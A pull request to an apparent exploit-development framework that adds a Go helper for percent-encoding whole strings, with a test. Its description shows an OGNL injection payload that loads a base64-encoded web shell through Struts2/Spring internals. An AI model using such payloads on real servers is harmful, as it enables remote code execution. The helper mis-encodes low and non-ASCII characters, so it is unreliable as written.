### PR TITLE
Add encoding that will URL encode the entire string

### DIFF
--- a/transform/encode.go
+++ b/transform/encode.go
@@ -3,6 +3,7 @@ package transform
 import (
 	"encoding/base64"
 	"encoding/binary"
+	"strconv"
 	"strings"
 
 	"github.com/vulncheck-oss/go-exploit/output"
@@ -27,6 +28,16 @@ func DecodeBase64(s string) string {
 
 func Title(s string) string {
 	return cases.Title(language.Und, cases.NoLower).String(s)
+}
+
+// URL encode every character in the provided string.
+func URLEncodeString(inputString string) string {
+	encodedChars := ""
+	for _, char := range inputString {
+		encodedChars += "%" + strconv.FormatInt(int64(char), 16)
+	}
+
+	return encodedChars
 }
 
 // PackLittleInt32 packs a little-endian 32-bit integer as a string.

--- a/transform/encode_test.go
+++ b/transform/encode_test.go
@@ -4,6 +4,16 @@ import (
 	"testing"
 )
 
+func TestURLEncodeString(t *testing.T) {
+	encoded := URLEncodeString("foo !~")
+
+	if encoded != "%66%6f%6f%20%21%7e" {
+		t.Fatal(encoded)
+	}
+
+	t.Log(encoded)
+}
+
 func TestEncodeBase64(t *testing.T) {
 	encoded := EncodeBase64("foo")
 


### PR DESCRIPTION
Even if it doesn't need it. Basic use case:

```go
	params := map[string]string{
		param: transform.urlEncodeString("(@org.springframework.cglib.core.ReflectUtils@defineClass('" + className +
			"',@org.springframework.util.Base64Utils@decodeFromString('" + encodedShell +
			"'),@java.lang.Thread@currentThread().getContextClassLoader())).newInstance()"),
		`label`: transform.urlEncodeString(unused+`\u0027+#request.get(\u0027.KEY_velocity.struts2.context\u0027).internalGet(\u0027ognl\u0027).findValue(#parameters.`+
			param+`,{})+\u0027`),
	}
```

![2024-02-18_06-52](https://github.com/vulncheck-oss/go-exploit/assets/113205286/84fb33f3-37ac-4327-95df-4387b1fe8578)
